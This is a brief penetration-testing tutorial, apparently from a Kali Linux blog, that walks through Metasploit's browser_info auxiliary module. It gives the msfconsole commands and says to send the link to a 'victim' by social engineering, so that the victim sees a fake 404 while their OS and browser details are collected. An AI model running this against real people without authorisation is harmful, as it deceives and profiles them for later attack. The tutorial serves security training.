Kali Linux, Penetration Testing

Gather Browser and OS Information of Remote PC using Http Client Exploit

This module gathers information about a browser that exploits might be interested in, such as OS name, browser version, plugins, etc. By default, the module will return a fake 404, but you can customize this output by changing the Custom404 datastore option, and redirect to an external web page.

Exploit Targets

Windows 10



Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use auxiliary/gather/browser_info

msf exploit (browser_info)>set lhost (IP of Local Host)

msf exploit (browser_info)>set srvhost 

msf exploit (browser_info)>exploit

Now send the link to victim via social engineering method when victim open your link the module will return a fake 404

In attack side you can get the OS and browser details of victim pc see the screenshot below